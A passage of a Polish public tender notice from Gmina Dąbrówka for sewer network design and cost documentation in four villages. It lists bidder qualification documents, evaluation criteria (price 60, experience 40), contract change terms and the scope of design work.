                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />
 1)  wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy.
Zamawiający żąda od Wykonawców , aby  udokumentowali posiadanie wiedzy i doświadczenia poprzez wykazanie  w okresie ostatnich 3 lat przed upływem terminu składania  ofert , a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie realizacji dwóch  usług   polegających   na wykonaniu dokumentacji projektowo-kosztorysowej zawierającej w swym zakresie  budowę lub przebudowę  kanalizacji sanitarnej  o długości minimum 1,0 km każda , w tym zakresie co najmniej w jednej dokumentacji będzie kanalizacja tłoczna i przepompownia ścieków - sporządzenie wykazu wykonanych usług załącznik nr 4.
Za wykonanie więcej niż dwóch dokumentacji projektowych kanalizacji sanitarnej będą przydzielane punkty w kryterium doświadczenie. Za każdą następną dokumentację projektowo-kosztorysową kanalizacji sanitarnej lub deszczowej o długości min. 500 mb Wykonawca otrzyma 10 punktów, maksymalnie 40 punktów.
2)  wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
 -  Wykonawcy dysponują osobami zdolnymi do wykonywania zamówienia , które będą uczestniczyć w wykonywaniu zamówienia tj. posiadającymi uprawnienia do projektowania  określone przepisami  Prawa budowlanego  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  ( 1 osoba) 
Zaproponowana  osoba   oprócz posiadania uprawnień do projektowania  musi  posiadać odpowiednie doświadczenie tj. być projektantem co najmniej 1 dokumentacji projektowej zawierających  w swym  zakresie budowę  lub przebudowę  kanalizacji sanitarnej grawitacyjnej i tłocznej o długości min. 1,0 km. 
Proponowana osoba do projektowania musi posiadać  uprawnienia , o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016, poz. 290 ze zm.) oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r, w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) lub zgodnie z wcześniej obowiązującymi przepisami dotyczące uznawania kwalifikacji.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu - wypełnione i podpisane przez wykonawcę, które stanowić będzie wstępne potwierdzenie spełnienia warunków udziału w postępowaniu oraz brak podstaw wykluczenia.    
3) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 2 - wypełnione i podpisane przez wykonawcę.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />W związku z art. 144 Pzp Zamawiający informuje , że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach: 
1) zmiany danych teleadresowych, osób wykonujących zamówienie 
2) zmian ewentualnego podwykonawcy, przy pomocy, którego Wykonawca realizuje przedmiot umowy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego. 
3) rozszerzenie zakresu  podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego 
4) zmiany terminu wykonywania umowy o czas opóźnienia jeżeli takie opóźnienie nastąpi lub będzie miało wpływ na wykonanie przedmiotu zamówienia z przyczyn niezależnych od Wykonawcy
5) zmiany ceny brutto - w przypadku zmiany obowiązującej stawki VAT 
6) zmiany zasad dokonywania odbioru 
7) nie stanowi zmiany umowy w rozumieniu art. 144 Pzp zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana konta bankowego).   <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/02/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Chajęty i Guzowatka. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiot zamówienia obejmuje sporządzenie dokumentacji projektowo - kosztorysowej sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Zadanie nr 1 - Chajęty i Guzowatka o długości około 6,5 km; Zadanie nr 2 - Trojany i Zaścienie o długości około 4,5 km. Długość kanalizacji tłocznej uzależniona będzie od ilości zaprojektowanych przepompowni sieciowych. Sieć należy zaprojektować w drogach powiatowych i gminnych.
Podana  długość jest jedynie szacunkowa i nie jest dla projektanta wiążąca - jej zmiana nie będzie stanowiła podstawy do zmiany wartości umowy.
Sieć kanalizacyjna będąca przedmiotem zamówienia, musi zostać zaprojektowana w taki sposób aby współpracowała z istniejącą siecią kanalizacyjną: dla miejscowości Trojany i Zaścienie włączenie na granicy miejscowości Karpin i Trojany, dla miejscowości Chajęty i Guzowatka włączenie w miejscowości Małopole.      
Kolektory kanalizacji sanitarnej wraz z odgałęzieniami sieci do granicy działek użytkowników należy zaprojektować w sposób umożliwiający podłączenie grawitacyjne indywidualnych użytkowników. W projekcie należy również wskazać trasę  przyłącza kanalizacyjnego od granicy nieruchomości do istniejącego lub projektowanego budynku.
Zamawiający załącza do SIWZ poglądowe szkice proponowanego przebiegu sieci kanalizacyjnej i Program Gospodarki Ściekowej dla Gminy Dąbrówka do ewentualnego wykorzystania przez Wykonawców przy ocenie zakresu zamówienia.
3.1. Zakres prac projektowych obejmuje opracowanie dla każdego zadania:
a) podkładów mapowych do celów projektowych,
b) projektu budowlanego -5 egz. w zakresie niezbędnym do złożenia wniosku i uzyskaniu przez  Wykonawcę decyzji pozwolenia na budowę , 
c) projektu wykonawczego  w rozbiciu na branże - 5  egz.,
d) specyfikacji technicznej wykonania i odbioru robót - 2 egz.,  
e) przedmiarów robót  -2 egz. z podziałem na sieć grawitacyjną do granicy działek, kanalizację tłoczną z przepompowniami ścieków  oraz oddzielnie na przyłącza kanalizacyjne na odcinku od granicy nieruchomości do istniejącego lub projektowanego w raz z ze zbiorczym zestawieniem przyłączy (nr działki, właściciel, długość przyłącza, ilość studzienek kanalizacyjnych, szamba przewidziane do likwidacji ).   
Przedmiar robót musi obejmować zestawienie wszystkich robót wynikających z projektu.
Poszczególne działania opisane w przedmiarze muszą być podzielone na grupy robót wg takiego podziału jaki jest przyjęty w STWiORB. 
Przedmiar będzie stanowił podstawę do wyliczenia ceny przez Wykonawcę robót budowlanych w zamówieniu publicznym na realizację zadań, dlatego Zamawiający wymaga, aby był on sporządzony w układzie tabelarycznym zgodnym z § 10 Rozporządzenia Ministra Infrastruktury (Dz.U.2004.202.2072) oraz dodatkowo uzupełniony o kolumny cena jednostkowa i wartość,
f) kosztorysów inwestorskich- 2 egz. ( na podstawie przedmiarów) z podaniem nazw i kodów określonych we wspólnym słowniku zamówień, 
g) sporządzenie operatów wodno - prawnych i uzyskanie zgody na przejście pod ciekami wodnymi wraz z uzyskaniem pozwolenia wodno - prawnego - jeśli będzie wymagane,
h) przeprowadzenie procedury oceny oddziaływania na środowisko przedsięwzięcia wraz z przygotowaniem wniosku i niezbędnych załączników do wydania decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia (tj. raport oddziaływania na środowisko, przebieg sieci wkreślony na mapach ewidencyjnych, itd.) - jeśli będzie wymagane, 
i) uzyskanie wszelkich koniecznych warunków, decyzji, zgód, opinii oraz uzgodnień branżowych - w formie pisemnej i elektronicznej, 
3.2. Forma  opracowań:
a) dokumentacja projektowa, przedmiary robót i kosztorys inwestorski  w formie papierowej  i  na nośniku CD w formacie umożliwiającym ich odczyt i drukowanie przy wykorzystaniu bezpłatnego oprogramowania.
b) przynajmniej 2 egz. projektu budowlanego muszą być opieczętowane przez organ wydający pozwolenie na budowę.
c) wykonawca  przystąpi do końcowej edycji dokumentacji projektowej po uzgodnieniu jej z Zamawiającym i Zakładem Gospodarki Komunalnej w Dąbrówce,
d) wykonawca zobowiązany jest do sporządzenia wersji przetargowej projektu oraz przedmiaru robót w sposób określony w art. 29-31 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t. j. Dz. U. z 2015 r. poz. 2164 z późn.zm.)
3.3 Wykonawca zobowiązany jest do:
a) uzyskania zgody właścicieli, współwłaścicieli lub spadkobierców nieruchomości w formie oświadczeń pisemnych na przejście z projektowaną siecią kanalizacyjną  przez ich teren i ustanowienia służebności przesyłu na rzecz Gminy Dąbrówka,
b) uzyskanie zgody właścicieli, współwłaścicieli lub spadkobierców nieruchomości w formie oświadczeń pisemnych wraz załącznikiem graficznym z przedstawiającym lokalizacje sieci i przyłącza oraz zgodę lub odmowę na wykonanie sieci i przyłącza kanalizacyjnego, 
c) sporządzenie wykazu działek po których przebiega sieć kanalizacyjna oraz wykazu działek, dla których projektuje się przyłącza kanalizacyjne ( z wykazem właścicieli/zarządców),
d) wykonanie inwentaryzacji zieleni oraz wskazanie drzew przewidzianych do usunięcia/przesadzenia, które kolidują z projektowaną siecią kanalizacyjną,  
e)  uzyskania z upoważnienia zamawiającego decyzji udzielającej inwestorowi pozwolenia na budowę.
3.4.  Wszelkie opłaty administracyjne ponoszone w wyniku prowadzonych działań związanych z uzyskiwaniem opinii, badań, uzgodnień czy decyzji, wykonawca winien wliczyć do ceny opracowania dokumentacji projektowej w tym min.:
a) Uzyskania aktualnych podkładów geodezyjnych do celów projektowych.
b) Uzyskanie wypisów z miejscowego planu zagospodarowania  orz wypisów z rejestru gruntów
c) Wykonania badań geologicznych i dokumentacji przy założeniu wykonywania otworów pod każdą przepompownię ścieków oraz na trasie kanału grawitacyjnego w zależności od potrzeb, jednak nie mniej niż 1 otwór  na każdy rozpoczęty kilometr kanalizacji grawitacyjnej.
d) Opracowanie projektu organizacji ruchu na czas budowy- jeśli będzie wymagany
e) Przygotowanie wniosku o określenie warunków przyłączenia do sieci elektroenergetycznej przepompowni ścieków 
f) Opracowanie instrukcji zasilenia rezerwowego przepompowni agregatem prądotwórczym 
g) Uzyskania wszelkich nie wymienionych wyżej, a koniecznych dokumentów formalno-prawnych i pokrewnych, własnym staraniem.
W celu prawidłowego sporządzenia oferty Wykonawca winien przeprowadzić szczegółową wizję lokalną w celu uzyskania wszystkich niezbędnych informacji, co do ryzyka, trudności 
i wszelkich innych okoliczności, jakie mogą wystąpić.
3.5. Stan aktualny
a)	Miejscowości przewidziane do zaprojektowania sieci kanalizacyjnej objęte są miejscowym planem zagospodarowania przestrzennego. 
b)	Sieć i urządzenia kanalizacyjne będą zlokalizowane w pasie dróg  powiatowych i gminnych oraz na działkach prywatnych.  
c)	Uzbrojenie terenu: sieć gazowa i wodociągowa z przyłączami, przewody energetyczne 
napowietrzne i  kablowe oraz telekomunikacyjne. 
3.6. Pomoc techniczna 
Na etapie postępowania mającego na celu wybór wykonawcy robót: "Budowa sieci kanalizacyjnej wraz z przyłączami w miejscowościach Chajęty, Guzowatka, Trojany i Zaścienie" projektant będzie współpracował z zamawiającym w zakresie odpowiedzi na pytania wykonawców związane z Projektem Budowlanym i Wykonawczym. Wykonawca zobowiązany będzie do pełnienia nadzoru autorskiego w czasie trwania prac budowlanych, tj. od chwili rozpoczęcia robót do odbioru końcowego. Umowa na pełnienie nadzoru autorskiego zostanie zawarta z wykonawcą na oddzielnych zasadach
Kody Wspólnego Słownika Zamówień: 71320000-7	Usługi inżynieryjne w zakresie projektowania
2. Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 2. 
2.1 Przedmiot zamówienia w zakresie zadania nr 1 dotyczy Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Chajęty i Guzowatka. .
Zgodnie z opisem przedmiotu zamówienia w pkt. 1

2.2 Przedmiot zamówienia w zakresie zadania nr 2 dotyczy Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Trojany i Zaścienie.
Zgodnie z opisem przedmiotu zamówienia w pkt. 1


3. Zamawiający nie dopuszcza możliwości składania ofert wariantowych

4. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej

5. Zamawiający nie dopuszcza możliwości udzielenia zamówień uzupełniających.
6. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części zamówienia podwykonawcom:
6.1 Zamawiający nie wprowadza zastrzeżenia wskazującego na obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
6.2 W przypadku powierzenia wykonania części zamówienia podwykonawcy, Wykonawca zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
6.3 Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w pkt. 5.3 niniejszej Specyfikacji (art. 22a ust. 1 ustawy Pzp.), w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby zamawiający powoływał się w trakcie postępowania o udzielenie zamówienia. 
6.4 Wykonawca zobowiązany będzie przedstawić na wezwanie zamawiającego dokumenty, o których mowa w pkt. 7.2. ppkt. 1 - 9 w odniesieniu do podwykonawców.
6.5 Jeżeli powierzenie podwykonawcy wykonania części zamówienia na roboty budowlane lub usługi następuje w trakcie jego realizacji, wykonawca na żądanie zamawiającego przedstawi oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Pzp lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy. Obowiązek ten   nie dotyczy dalszych  podwykonawców.  
6.6 Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy.
6.7 Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie zamówienia.
7. Wymagania stawiane wykonawcy:
7.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
7.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
7.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
7.4 Określenie przez wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
7.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia. 

9 Wymagania organizacyjne
Nie dotyczy

10 Wymagania dot. gwarancji
     Nie dotyczy
10.1 Wymagania dot. rękojmi
 Zamawiający wspólnie z Wykonawcą dokumentacji projektowo-kosztorysowej rozszerzają odpowiedzialność Wykonawcy dokumentacji projektowo-kosztorysowej z tytułu rękojmi za wady fizyczne przedmiotu umowy. Termin rękojmi skończy się wraz z upływem  terminu odpowiedzialności z tytułu rękojmi za wady Wykonawcy robót budowlanych wykonywanych na podstawie dokumentacji będącej przedmiotem niniejszej umowy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Doświadczenie</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Trojany i Zaścienie.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiot zamówienia obejmuje sporządzenie dokumentacji projektowo - kosztorysowej sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Zadanie nr 1 - Chajęty i Guzowatka o długości około 6,5 km; Zadanie nr 2 - Trojany i Zaścienie o długości około 4,5 km. Długość kanalizacji tłocznej uzależniona będzie od ilości zaprojektowanych przepompowni sieciowych. Sieć należy zaprojektować w drogach powiatowych i gminnych.
Podana  długość jest jedynie szacunkowa i nie jest dla projektanta wiążąca - jej zmiana nie będzie stanowiła podstawy do zmiany wartości umowy.
Sieć kanalizacyjna będąca przedmiotem zamówienia, musi zostać zaprojektowana w taki sposób aby współpracowała z istniejącą siecią kanalizacyjną: dla miejscowości Trojany i Zaścienie włączenie na granicy miejscowości Karpin i Trojany, dla miejscowości Chajęty i Guzowatka włączenie w miejscowości Małopole.      
Kolektory kanalizacji sanitarnej wraz z odgałęzieniami sieci do granicy działek użytkowników należy zaprojektować w sposób umożliwiający podłączenie grawitacyjne indywidualnych użytkowników. W projekcie należy również wskazać trasę  przyłącza kanalizacyjnego od granicy nieruchomości do istniejącego lub projektowanego budynku.
